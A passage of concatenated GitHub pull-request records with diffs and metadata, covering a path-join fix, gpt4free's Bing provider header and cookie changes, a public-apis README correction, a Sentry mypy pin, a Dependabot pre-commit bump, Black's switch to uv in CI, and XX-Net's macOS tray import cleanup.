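# An absolute component resets the join, dropping host and share entirely,
# which is why smbclient then parsed "Sales" as the host in the traceback:
print(posixpath.join(host, share, "/Sales/TestData/file.txt"))
# -> /Sales/TestData/file.txt

# Stripping the leading slash, as the fix does, keeps the full prefix:
print(posixpath.join(host, share, "/Sales/TestData/file.txt".lstrip("/")))
# -> ip/share/Sales/TestData/file.txt
```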
Index | diff --git a/g4f/Provider/Bing.py b/g4f/Provider/Bing.py
index 5b5f89aaa5..1e29c4f119 100644
--- a/g4f/Provider/Bing.py
+++ b/g4f/Provider/Bing.py
@@ -66,7 +66,7 @@ def create_async_generator(
prompt = messages[-1]["content"]
context = create_context(messages[:-1])
- cookies = {**Defaults.cookies, **cookies} if cookies else Defaults.cookies
+ cookies = {**get_default_cookies(), **cookies} if cookies else get_default_cookies()
gpt4_turbo = True if model.startswith("gpt-4-turbo") else False
@@ -146,8 +146,8 @@ class Defaults:
"streamf", "codeint", "langdtwb", "fdwtlst", "fluxprod", "deuct3"
]
- # Default cookies
- cookies = {
+def get_default_cookies():
+ return {
'SRCHD' : 'AF=NOFORM',
'PPLState' : '1',
'KievRPSSecAuth': '',
diff --git a/g4f/Provider/bing/conversation.py b/g4f/Provider/bing/conversation.py
index 388bdd6bc4..fb95e241f2 100644
--- a/g4f/Provider/bing/conversation.py
+++ b/g4f/Provider/bing/conversation.py
@@ -1,5 +1,6 @@
from __future__ import annotations
+import uuid
from aiohttp import ClientSession
class Conversation:
@@ -30,8 +31,20 @@ async def create_conversation(session: ClientSession, proxy: str = None) -> Conv
Returns:
Conversation: An instance representing the created conversation.
"""
- url = 'https://www.bing.com/turing/conversation/create?bundleVersion=1.1199.4'
+ url = 'https://www.bing.com/search?toncp=0&FORM=hpcodx&q=Bing+AI&showconv=1&cc=en'
async with session.get(url, proxy=proxy) as response:
+ response.raise_for_status()
+ headers = {
+ "accept": "application/json",
+ "sec-fetch-dest": "empty",
+ "sec-fetch-mode": "cors",
+ "sec-fetch-site": "same-origin",
+ "x-ms-client-request-id": str(uuid.uuid4()),
+ "x-ms-useragent": "azsdk-js-api-client-factory/1.0.0-beta.1 core-rest-pipeline/1.12.3 OS/Windows",
+ "referer": url
+ }
+ url = 'https://www.bing.com/turing/conversation/create?bundleVersion=1.1579.2'
+ async with session.get(url, headers=headers, proxy=proxy) as response:
try:
data = await response.json()
except:
diff --git a/image.html b/image.html
deleted file mode 100644
index d774b373e8..0000000000
--- a/image.html
+++ /dev/null
@@ -1,3 +0,0 @@
-<style type="text/css">#designer_attribute_container{display:flex;justify-content:space-between;width:100%;margin-top:10px}#designer_attribute_container .des_attr_i{width:16px;margin-right:2px}#designer_attribute_container .des_attr_txt{height:18px;line-height:18px;font-size:14px;font-weight:400;font-family:"Roboto",Helvetica,sans-serif}#designer_attribute_container #dalle_attribute_container{margin-left:auto}#designer_attribute_container #dalle_attribute_container .des_attr_dal{display:flex;justify-content:center;height:14px;border-radius:4px;background-color:#5f5f5e;padding:2px 8px}#designer_attribute_container #dalle_attribute_container .des_attr_dal_txt{height:14px;line-height:14px;font-size:11px;font-weight:400;font-family:"Roboto",Helvetica,sans-serif;color:#fff}.des_attr_txt{color:#fff}</style><div id="gir_async"
- class="giric gir_1" data-rewriteurl="/images/create/a-serene-garden-filled-with-colorful-flowers-in-fu/1-65c8a550c2d34e67a93b016cd1f3ade3?FORM=GENCRE" data-cis="512" data-vimgseturl="/images/create/async/viewimageset/1-65c8a550c2d34e67a93b016cd1f3ade3&IG=062C548EC8DD4047A2AAE63FD928194A&IID=images.vis"
- fir-th="OIG2.EPxx_.JFG402kzMQYYhj" data-ctc="Image copied to clipboard" data-wide="" data-wide-mobile=""><a class="single-img-link" target="_blank" href="/images/create/a-serene-garden-filled-with-colorful-flowers-in-fu/1-65c8a550c2d34e67a93b016cd1f3ade3?id=LrsKPoRLQud1%2bT8YdxQDhA%3d%3d&view=detailv2&idpp=genimg&FORM=GCRIDP" h="ID=images,5015.1"><img class="gir_mmimg" src="https://tse4.mm.bing.net/th/id/OIG2.EPxx_.JFG402kzMQYYhj?w=270&h=270&c=6&r=0&o=5&pid=ImgGn" alt="a serene garden filled with colorful flowers in full bloom"/></a><div id="designer_attribute_container"><img class="des_attr_i rms_img" alt="Designer" src="https://r.bing.com/rp/gmZtdJVd-klWl3XWpa6-ni1FU3M.svg" /><span class="des_attr_txt des_attr_txt_clr">Designer</span><div id="dalle_attribute_container"><div class="des_attr_dal"><span class="des_attr_dal_txt">Powered by DALL·E 3</span></div></div></div></div>
\ No newline at end of file
| https://api.github.com/repos/xtekky/gpt4free/pulls/1597 | 2024-02-17T21:37:07Z | 2024-02-17T21:37:47Z | 2024-02-17T21:37:47Z | 2024-02-18T03:19:57Z | 1,417 | xtekky/gpt4free | 38,139 | |
Update README.md | diff --git a/README.md b/README.md
index 1da3eadc0c..87dbda2f03 100644
--- a/README.md
+++ b/README.md
@@ -383,7 +383,7 @@ API | Description | Auth | HTTPS | CORS |
| [Steam](https://developer.valvesoftware.com/wiki/Steam_Web_API) | Steam Client Interaction | `OAuth` | Yes | Unknown |
| [Vainglory](https://developer.vainglorygame.com/) | Vainglory Players, Matches and Telemetry | `apiKey` | Yes | Yes |
| [Wargaming.net](https://developers.wargaming.net/) | Wargaming.net info and stats | `apiKey` | Yes | No |
-| [xkcd](https://xkcd.com/json.html) | Retrieve xkcd comics as JSON | No | Yes | Unknown |
+| [xkcd](https://xkcd.com/json.html) | Retrieve xkcd comics as JSON | No | Yes | Yes |
### Geocoding
API | Description | Auth | HTTPS | CORS |
| xkcd seems to enforce CORS | https://api.github.com/repos/public-apis/public-apis/pulls/828 | 2018-11-28T15:43:58Z | 2018-12-05T02:03:34Z | 2018-12-05T02:03:34Z | 2018-12-05T02:03:35Z | 242 | public-apis/public-apis | 35,751 |
fix(mypy) Downgrade mypy | diff --git a/requirements-dev.txt b/requirements-dev.txt
index 5278bddae8373..d66b6b9f37e18 100644
--- a/requirements-dev.txt
+++ b/requirements-dev.txt
@@ -2,7 +2,7 @@ docker>=3.7.0,<3.8.0
exam>=0.5.1
freezegun==1.1.0
honcho>=1.0.0,<1.1.0
-mypy>=0.800
+mypy>=0.800,<0.900
openapi-core @ https://github.com/getsentry/openapi-core/archive/master.zip#egg=openapi-core
pytest==6.1.0
pytest-cov==2.11.1
| Apparently mypy 0.900 is not compatible. | https://api.github.com/repos/getsentry/sentry/pulls/26473 | 2021-06-08T20:09:24Z | 2021-06-08T20:59:52Z | 2021-06-08T20:59:52Z | 2021-06-24T00:01:08Z | 169 | getsentry/sentry | 44,319 |
Bump pre-commit from 2.16.0 to 2.17.0 | diff --git a/poetry.lock b/poetry.lock
index 38171bea9..00236f63e 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -699,7 +699,7 @@ testing = ["pytest", "pytest-benchmark"]
[[package]]
name = "pre-commit"
-version = "2.16.0"
+version = "2.17.0"
description = "A framework for managing and maintaining multi-language pre-commit hooks."
category = "dev"
optional = false
@@ -1049,7 +1049,7 @@ jupyter = ["ipywidgets"]
[metadata]
lock-version = "1.1"
python-versions = "^3.6.2"
-content-hash = "656a91a327289529d8bb9135fef6c66486a192e7a7e8ed682d7c3e7bf5f7b239"
+content-hash = "52b9945e394bf17a621aafd1d844a9c2f467d0fdb28d28d68b601d1a5caf4c82"
[metadata.files]
appnope = [
@@ -1487,8 +1487,8 @@ pluggy = [
{file = "pluggy-1.0.0.tar.gz", hash = "sha256:4224373bacce55f955a878bf9cfa763c1e360858e330072059e10bad68531159"},
]
pre-commit = [
- {file = "pre_commit-2.16.0-py2.py3-none-any.whl", hash = "sha256:758d1dc9b62c2ed8881585c254976d66eae0889919ab9b859064fc2fe3c7743e"},
- {file = "pre_commit-2.16.0.tar.gz", hash = "sha256:fe9897cac830aa7164dbd02a4e7b90cae49630451ce88464bca73db486ba9f65"},
+ {file = "pre_commit-2.17.0-py2.py3-none-any.whl", hash = "sha256:725fa7459782d7bec5ead072810e47351de01709be838c2ce1726b9591dad616"},
+ {file = "pre_commit-2.17.0.tar.gz", hash = "sha256:c1a8040ff15ad3d648c70cc3e55b93e4d2d5b687320955505587fd79bbaed06a"},
]
prometheus-client = [
{file = "prometheus_client-0.12.0-py2.py3-none-any.whl", hash = "sha256:317453ebabff0a1b02df7f708efbab21e3489e7072b61cb6957230dd004a0af0"},
diff --git a/pyproject.toml b/pyproject.toml
index 4f7d8dd26..4faf29818 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -45,7 +45,7 @@ mypy = "^0.930"
pytest-cov = "^3.0.0"
attrs = "^21.4.0"
types-dataclasses = "^0.6.4"
-pre-commit = "^2.16.0"
+pre-commit = "^2.17.0"
[build-system]
requires = ["poetry-core>=1.0.0"]
| Bumps [pre-commit](https://github.com/pre-commit/pre-commit) from 2.16.0 to 2.17.0.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a href="https://github.com/pre-commit/pre-commit/releases">pre-commit's releases</a>.</em></p>
<blockquote>
<h2>pre-commit v2.17.0</h2>
<h3>Features</h3>
<ul>
<li>add warnings for regexes containing <code>[\\/]</code>.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2151">#2151</a> issue by <a href="https://github.com/sanjioh"><code>@sanjioh</code></a>.</li>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2154">#2154</a> PR by <a href="https://github.com/kuviokelluja"><code>@kuviokelluja</code></a>.</li>
</ul>
</li>
<li>upgrade supported ruby versions.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2205">#2205</a> PR by <a href="https://github.com/jalessio"><code>@jalessio</code></a>.</li>
</ul>
</li>
<li>allow <code>language: conda</code> to use <code>mamba</code> or <code>micromamba</code> via <code>PRE_COMMIT_USE_MAMBA=1</code> or <code>PRE_COMMIT_USE_MICROMAMBA=1</code> respectively.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2204">#2204</a> issue by <a href="https://github.com/janjagusch"><code>@janjagusch</code></a>.</li>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2207">#2207</a> PR by <a href="https://github.com/xhochy"><code>@xhochy</code></a>.</li>
</ul>
</li>
<li>display <code>git --version</code> in error report.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2210">#2210</a> PR by <a href="https://github.com/asottile"><code>@asottile</code></a>.</li>
</ul>
</li>
<li>add <code>language: lua</code> as a supported language.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2158">#2158</a> PR by <a href="https://github.com/mblayman"><code>@mblayman</code></a>.</li>
</ul>
</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>temporarily add <code>setuptools</code> to the zipapp.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2122">#2122</a> issue by <a href="https://github.com/andreoliwa"><code>@andreoliwa</code></a>.</li>
<li>a737d5f commit by <a href="https://github.com/asottile"><code>@asottile</code></a>.</li>
</ul>
</li>
<li>use <code>go install</code> instead of <code>go get</code> for go 1.18+ support.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2161">#2161</a> PR by <a href="https://github.com/schmir"><code>@schmir</code></a>.</li>
</ul>
</li>
<li>fix <code>language: r</code> with a local renv and <code>RENV_PROJECT</code> set.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2170">#2170</a> PR by <a href="https://github.com/lorenzwalthert"><code>@lorenzwalthert</code></a>.</li>
</ul>
</li>
<li>forbid overriding <code>entry</code> in <code>language: meta</code> hooks which breaks them.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2180">#2180</a> issue by <a href="https://github.com/DanKaplanSES"><code>@DanKaplanSES</code></a>.</li>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2181">#2181</a> PR by <a href="https://github.com/asottile"><code>@asottile</code></a>.</li>
</ul>
</li>
<li>always use <code>#!/bin/sh</code> on windows for hook script.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2182">#2182</a> issue by <a href="https://github.com/hushigome-visco"><code>@hushigome-visco</code></a>.</li>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2187">#2187</a> PR by <a href="https://github.com/asottile"><code>@asottile</code></a>.</li>
</ul>
</li>
</ul>
</blockquote>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a href="https://github.com/pre-commit/pre-commit/blob/master/CHANGELOG.md">pre-commit's changelog</a>.</em></p>
<blockquote>
<h1>2.17.0 - 2022-01-18</h1>
<h3>Features</h3>
<ul>
<li>add warnings for regexes containing <code>[\\/]</code>.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2151">#2151</a> issue by <a href="https://github.com/sanjioh"><code>@sanjioh</code></a>.</li>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2154">#2154</a> PR by <a href="https://github.com/kuviokelluja"><code>@kuviokelluja</code></a>.</li>
</ul>
</li>
<li>upgrade supported ruby versions.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2205">#2205</a> PR by <a href="https://github.com/jalessio"><code>@jalessio</code></a>.</li>
</ul>
</li>
<li>allow <code>language: conda</code> to use <code>mamba</code> or <code>micromamba</code> via
<code>PRE_COMMIT_USE_MAMBA=1</code> or <code>PRE_COMMIT_USE_MICROMAMBA=1</code> respectively.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2204">#2204</a> issue by <a href="https://github.com/janjagusch"><code>@janjagusch</code></a>.</li>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2207">#2207</a> PR by <a href="https://github.com/xhochy"><code>@xhochy</code></a>.</li>
</ul>
</li>
<li>display <code>git --version</code> in error report.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2210">#2210</a> PR by <a href="https://github.com/asottile"><code>@asottile</code></a>.</li>
</ul>
</li>
<li>add <code>language: lua</code> as a supported language.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2158">#2158</a> PR by <a href="https://github.com/mblayman"><code>@mblayman</code></a>.</li>
</ul>
</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>temporarily add <code>setuptools</code> to the zipapp.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2122">#2122</a> issue by <a href="https://github.com/andreoliwa"><code>@andreoliwa</code></a>.</li>
<li>a737d5f commit by <a href="https://github.com/asottile"><code>@asottile</code></a>.</li>
</ul>
</li>
<li>use <code>go install</code> instead of <code>go get</code> for go 1.18+ support.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2161">#2161</a> PR by <a href="https://github.com/schmir"><code>@schmir</code></a>.</li>
</ul>
</li>
<li>fix <code>language: r</code> with a local renv and <code>RENV_PROJECT</code> set.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2170">#2170</a> PR by <a href="https://github.com/lorenzwalthert"><code>@lorenzwalthert</code></a>.</li>
</ul>
</li>
<li>forbid overriding <code>entry</code> in <code>language: meta</code> hooks which breaks them.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2180">#2180</a> issue by <a href="https://github.com/DanKaplanSES"><code>@DanKaplanSES</code></a>.</li>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2181">#2181</a> PR by <a href="https://github.com/asottile"><code>@asottile</code></a>.</li>
</ul>
</li>
<li>always use <code>#!/bin/sh</code> on windows for hook script.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2182">#2182</a> issue by <a href="https://github.com/hushigome-visco"><code>@hushigome-visco</code></a>.</li>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2187">#2187</a> PR by <a href="https://github.com/asottile"><code>@asottile</code></a>.</li>
</ul>
</li>
</ul>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/pre-commit/pre-commit/commit/d3bdf1403d92f8cf2dc77bd99a5da42f0a6cef17"><code>d3bdf14</code></a> v2.17.0</li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/b22b313e4b042867bf0835f0e842a7281f6faf91"><code>b22b313</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2158">#2158</a> from mblayman/lua</li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/54331dca6fcfff1a06c43defb29b395898c65ce8"><code>54331dc</code></a> get lua version from luarocks itself</li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/3f8be7400d523fafe8c6d2d0fa4fb1560e7ae21d"><code>3f8be74</code></a> Add naive and untested version of Lua language support.</li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/7a305e5d9ab5e94f2d93599008d20e38f5842ac9"><code>7a305e5</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2210">#2210</a> from pre-commit/git-version</li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/c05f58b776603dc2a5222f035c2dc058426497de"><code>c05f58b</code></a> add git version to error output</li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/12b482345b4eee0153ebabbd3911614ac48d6687"><code>12b4823</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2207">#2207</a> from xhochy/mamba</li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/83aa65c4291b8a1a134cd024fbe071323f400c83"><code>83aa65c</code></a> Add mamba support to <code>language: conda</code></li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/657e76ba77ef4ae5b6e2ebe5f06cacdbf22a19a2"><code>657e76b</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2205">#2205</a> from jalessio/jamie/upgrade-rbenv</li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/428dc6e46eb68065bfc115419927949cdd056811"><code>428dc6e</code></a> Update rbenv / ruby-build versions</li>
<li>Additional commits viewable in <a href="https://github.com/pre-commit/pre-commit/compare/v2.16.0...v2.17.0">compare view</a></li>
</ul>
</details>
<br />
[](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.
[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)
---
<details>
<summary>Dependabot commands and options</summary>
<br />
You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
</details> | https://api.github.com/repos/Textualize/rich/pulls/1850 | 2022-01-19T13:30:47Z | 2022-02-11T11:13:51Z | 2022-02-11T11:13:51Z | 2022-02-11T11:15:09Z | 785 | Textualize/rich | 48,346 |
Use uv in docs build | diff --git a/.github/workflows/doc.yml b/.github/workflows/doc.yml
index 006991a16d..4c592d7391 100644
--- a/.github/workflows/doc.yml
+++ b/.github/workflows/doc.yml
@@ -30,9 +30,9 @@ jobs:
- name: Install dependencies
run: |
- python -m pip install --upgrade pip setuptools wheel
- python -m pip install -e ".[d]"
- python -m pip install -r "docs/requirements.txt"
+ python -m pip install uv
+ python -m uv pip install --system -e ".[d]"
+ python -m uv pip install --system -r "docs/requirements.txt"
- name: Build documentation
run: sphinx-build -a -b html -W --keep-going docs/ docs/_build
| Currently pip spends >20s here | https://api.github.com/repos/psf/black/pulls/4310 | 2024-04-14T08:10:10Z | 2024-04-14T08:51:07Z | 2024-04-14T08:51:07Z | 2024-04-14T08:51:12Z | 193 | psf/black | 24,620 |
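The change above swaps `pip` for `uv` in the docs workflow purely for speed. The step's logic can be sketched as a small command builder — a hypothetical helper, not part of the PR; only the `python -m uv pip install --system` invocation comes from the workflow itself:

```python
import sys

def install_cmd(args, use_uv):
    """Build the dependency-install command the workflow step would run."""
    if use_uv:
        # uv is installed first, then invoked through the interpreter,
        # mirroring `python -m uv pip install --system ...` in the workflow.
        return [sys.executable, "-m", "uv", "pip", "install", "--system", *args]
    return [sys.executable, "-m", "pip", "install", *args]

print(install_cmd(["-e", ".[d]"], use_uv=True)[1:])
print(install_cmd(["-r", "docs/requirements.txt"], use_uv=False)[1:])
```

The `--system` flag is needed because uv defaults to requiring a virtual environment, whereas CI installs into the runner's interpreter directly.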
Mac: dramatically improve startup speed
index b9cbf863f4..2f011efdb3 100644
--- a/launcher/mac_tray.py
+++ b/launcher/mac_tray.py
@@ -22,12 +22,12 @@
import subprocess
import webbrowser
-from AppKit import *
-from SystemConfiguration import *
+import AppKit
+import SystemConfiguration
from instances import xlog
from PyObjCTools import AppHelper
-class MacTrayObject(NSObject):
+class MacTrayObject(AppKit.NSObject):
def __init__(self):
pass
@@ -37,12 +37,12 @@ def applicationDidFinishLaunching_(self, notification):
self.registerObserver()
def setupUI(self):
- self.statusbar = NSStatusBar.systemStatusBar()
- self.statusitem = self.statusbar.statusItemWithLength_(NSSquareStatusItemLength) #NSSquareStatusItemLength #NSVariableStatusItemLength
+ self.statusbar = AppKit.NSStatusBar.systemStatusBar()
+ self.statusitem = self.statusbar.statusItemWithLength_(AppKit.NSSquareStatusItemLength) #NSSquareStatusItemLength #NSVariableStatusItemLength
# Set initial image icon
icon_path = os.path.join(current_path, "web_ui", "favicon-mac.ico")
- image = NSImage.alloc().initByReferencingFile_(icon_path.decode('utf-8'))
+ image = AppKit.NSImage.alloc().initByReferencingFile_(icon_path.decode('utf-8'))
image.setScalesWhenResized_(True)
image.setSize_((20, 20))
self.statusitem.setImage_(image)
@@ -55,63 +55,63 @@ def setupUI(self):
proxyState = getProxyState(currentService)
# Build a very simple menu
- self.menu = NSMenu.alloc().initWithTitle_('XX-Net')
+ self.menu = AppKit.NSMenu.alloc().initWithTitle_('XX-Net')
- menuitem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Config', 'config:', '')
+ menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Config', 'config:', '')
self.menu.addItem_(menuitem)
- menuitem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(getCurrentServiceMenuItemTitle(), None, '')
+ menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(getCurrentServiceMenuItemTitle(), None, '')
self.menu.addItem_(menuitem)
self.currentServiceMenuItem = menuitem
- menuitem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Enable Auto GAEProxy', 'enableAutoProxy:', '')
+ menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Enable Auto GAEProxy', 'enableAutoProxy:', '')
if proxyState == 'pac':
- menuitem.setState_(NSOnState)
+ menuitem.setState_(AppKit.NSOnState)
self.menu.addItem_(menuitem)
self.autoGaeProxyMenuItem = menuitem
- menuitem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Enable Global GAEProxy', 'enableGlobalProxy:', '')
+ menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Enable Global GAEProxy', 'enableGlobalProxy:', '')
if proxyState == 'gae':
- menuitem.setState_(NSOnState)
+ menuitem.setState_(AppKit.NSOnState)
self.menu.addItem_(menuitem)
self.globalGaeProxyMenuItem = menuitem
- menuitem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Disable GAEProxy', 'disableProxy:', '')
+ menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Disable GAEProxy', 'disableProxy:', '')
if proxyState == 'disable':
- menuitem.setState_(NSOnState)
+ menuitem.setState_(AppKit.NSOnState)
self.menu.addItem_(menuitem)
self.disableGaeProxyMenuItem = menuitem
# Reset Menu Item
- menuitem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Reload GAEProxy', 'resetGoagent:', '')
+ menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Reload GAEProxy', 'resetGoagent:', '')
self.menu.addItem_(menuitem)
# Default event
- menuitem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Quit', 'windowWillClose:', '')
+ menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Quit', 'windowWillClose:', '')
self.menu.addItem_(menuitem)
# Bind it to the status item
self.statusitem.setMenu_(self.menu)
# Hide dock icon
- NSApp.setActivationPolicy_(NSApplicationActivationPolicyProhibited)
+ AppKit.NSApp.setActivationPolicy_(AppKit.NSApplicationActivationPolicyProhibited)
def updateStatusBarMenu(self):
self.currentServiceMenuItem.setTitle_(getCurrentServiceMenuItemTitle())
# Remove Tick before All Menu Items
- self.autoGaeProxyMenuItem.setState_(NSOffState)
- self.globalGaeProxyMenuItem.setState_(NSOffState)
- self.disableGaeProxyMenuItem.setState_(NSOffState)
+ self.autoGaeProxyMenuItem.setState_(AppKit.NSOffState)
+ self.globalGaeProxyMenuItem.setState_(AppKit.NSOffState)
+ self.disableGaeProxyMenuItem.setState_(AppKit.NSOffState)
# Get current selected mode
proxyState = getProxyState(currentService)
# Update Tick before Menu Item
if proxyState == 'pac':
- self.autoGaeProxyMenuItem.setState_(NSOnState)
+ self.autoGaeProxyMenuItem.setState_(AppKit.NSOnState)
elif proxyState == 'gae':
- self.globalGaeProxyMenuItem.setState_(NSOnState)
+ self.globalGaeProxyMenuItem.setState_(AppKit.NSOnState)
elif proxyState == 'disable':
- self.disableGaeProxyMenuItem.setState_(NSOnState)
+ self.disableGaeProxyMenuItem.setState_(AppKit.NSOnState)
# Trigger autovalidation
self.menu.update()
@@ -126,16 +126,16 @@ def presentAlert_withTitle_(self, msg, title):
return self.alertReturn
def presentAlertWithInfo_(self, info):
- alert = NSAlert.alloc().init()
+ alert = AppKit.NSAlert.alloc().init()
alert.setMessageText_(info[0])
alert.setInformativeText_(info[1])
alert.addButtonWithTitle_("OK")
alert.addButtonWithTitle_("Cancel")
- self.alertReturn = alert.runModal() == NSAlertFirstButtonReturn
+ self.alertReturn = alert.runModal() == AppKit.NSAlertFirstButtonReturn
def registerObserver(self):
- nc = NSWorkspace.sharedWorkspace().notificationCenter()
- nc.addObserver_selector_name_object_(self, 'windowWillClose:', NSWorkspaceWillPowerOffNotification, None)
+ nc = AppKit.NSWorkspace.sharedWorkspace().notificationCenter()
+ nc.addObserver_selector_name_object_(self, 'windowWillClose:', AppKit.NSWorkspaceWillPowerOffNotification, None)
def windowWillClose_(self, notification):
executeResult = subprocess.check_output(['networksetup', '-listallnetworkservices'])
@@ -156,7 +156,7 @@ def windowWillClose_(self, notification):
module_init.stop_all()
os._exit(0)
- NSApp.terminate_(self)
+ AppKit.NSApp.terminate_(self)
def config_(self, notification):
host_port = config.get(["modules", "launcher", "control_port"], 8085)
@@ -280,30 +280,30 @@ def helperDisableGlobalProxy(service):
def fetchCurrentService(protocol):
global currentService
- status = SCDynamicStoreCopyValue(None, "State:/Network/Global/" + protocol)
+ status = SystemConfiguration.SCDynamicStoreCopyValue(None, "State:/Network/Global/" + protocol)
if not status:
currentService = None
return
serviceID = status['PrimaryService']
- service = SCDynamicStoreCopyValue(None, "Setup:/Network/Service/" + serviceID)
+ service = SystemConfiguration.SCDynamicStoreCopyValue(None, "Setup:/Network/Service/" + serviceID)
if not service:
currentService = None
return
currentService = service['UserDefinedName']
-@objc.callbackFor(CFNotificationCenterAddObserver)
+@AppKit.objc.callbackFor(AppKit.CFNotificationCenterAddObserver)
def networkChanged(center, observer, name, object, userInfo):
fetchCurrentService('IPv4')
sys_tray.updateStatusBarMenu()
# Note: the following code can't run in class
def serve_forever():
- app = NSApplication.sharedApplication()
+ app = AppKit.NSApplication.sharedApplication()
app.setDelegate_(sys_tray)
# Listen for network change
- nc = CFNotificationCenterGetDarwinNotifyCenter()
- CFNotificationCenterAddObserver(nc, None, networkChanged, "com.apple.system.config.network_change", None, CFNotificationSuspensionBehaviorDeliverImmediately)
+ nc = AppKit.CFNotificationCenterGetDarwinNotifyCenter()
+ AppKit.CFNotificationCenterAddObserver(nc, None, networkChanged, "com.apple.system.config.network_change", None, AppKit.CFNotificationSuspensionBehaviorDeliverImmediately)
fetchCurrentService('IPv4')
AppHelper.runEventLoop()
| AppKit exports a very large number of symbols, so `from AppKit import *` takes a long time
On my machine (a mid-2012 MacBook Pro) startup time dropped from 4.25s to 0.21s | https://api.github.com/repos/XX-net/XX-Net/pulls/2642 | 2016-04-02T14:58:05Z | 2016-04-03T03:42:50Z | 2016-04-03T03:42:50Z | 2016-04-03T03:42:50Z | 2,068 | XX-net/XX-Net | 17,146 |
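The PR body above argues that a wildcard import is slow because it must look up and bind every public name the module exports, while a plain import binds a single name. The effect can be shown generically with a stdlib module standing in for `AppKit` (which is macOS-only and exports far more symbols) — this is an illustration, not code from the PR:

```python
# Compare how many names each import style binds into a namespace.
star_ns, plain_ns = {}, {}
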